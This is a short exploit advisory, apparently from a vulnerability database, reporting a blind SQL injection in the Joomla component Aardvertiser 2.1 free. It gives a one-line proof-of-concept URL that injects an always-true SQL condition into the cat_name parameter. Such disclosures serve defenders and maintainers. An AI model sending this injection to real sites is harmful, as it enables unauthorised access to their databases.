Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24707
HistorySep 12, 2010 - 12:00 a.m.

Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability

2010-09-1200:00:00
vulners.com
25

Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability

Date: 07.09.2010

Author: Stephan Sattler // www.solidmedia.de

Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download

Version: 2.1 free

[ Vulnerability//PoC ]

http://www.site.com/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view